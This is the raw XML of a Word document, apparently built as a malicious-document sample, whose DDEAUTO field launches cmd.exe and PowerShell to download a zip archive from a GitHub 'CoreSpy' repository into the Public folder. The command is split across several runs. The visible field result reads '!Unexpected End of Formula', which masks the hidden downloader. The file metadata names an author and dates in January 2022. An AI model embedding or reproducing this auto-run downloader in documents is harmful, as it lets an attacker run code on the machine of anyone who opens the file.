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81" w:rsidRPr="006B0981" w:rsidRDefault="00F86BC0" w:rsidP="006B0981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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="0073AA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:instrText xml:space="preserve">DDEAUTO "C:\\Windows\\System32\\cmd.exe" "/k powershell </w:instrText>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B0981" w:rsidRDefault="006B0981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$url = "https://github.com/TartSoft/CoreSpy/archive/</w:instrText>
      </w:r>
      <w:r w:rsidR="008742A2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$branch-</w:instrText>
      </w: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 xml:space="preserve">master.zip" </w:instrText>
      </w:r>
    </w:p>
    <w:p w:rsidR="008742A2" w:rsidRDefault="006B0981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$output = "C:\Users\Public</w:instrText>
      </w:r>
      <w:r w:rsidR="008742A2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 xml:space="preserve">\Saved Games\master.zip" </w:instrText>
      </w:r>
    </w:p>
    <w:p w:rsidR="008742A2" w:rsidRDefault="008742A2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/>
          <w:color w:val="0073AA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE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$wc = New-Object System.Net.WebClient</w:instrText>
      </w:r>
    </w:p>
    <w:p w:rsidR="004336FE" w:rsidRPr="006B0981" w:rsidRDefault="008742A2" w:rsidP="006B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$wc.DownloadFile($url, $output)</w:instrText>
      </w:r>
      <w:r w:rsidR="00F86BC0">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="0073AA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:instrText>#"</w:instrText>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00F86BC0">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00F86BC0">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F86BC0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r w:rsidR="00F86BC0">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004336FE" w:rsidRPr="006B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panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default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C0"/>
    <w:rsid w:val="004336FE"/>
    <w:rsid w:val="006B0981"/>
    <w:rsid w:val="008742A2"/>
    <w:rsid w:val="00F15C1A"/>
    <w:rsid w:val="00F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C6373"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E8A3B3F5-C645-46B6-BFCA-E475540D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0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098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B0981"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006B0981"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006B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Le Hai</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Luu Le Hai</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-12T01:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-12T07:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>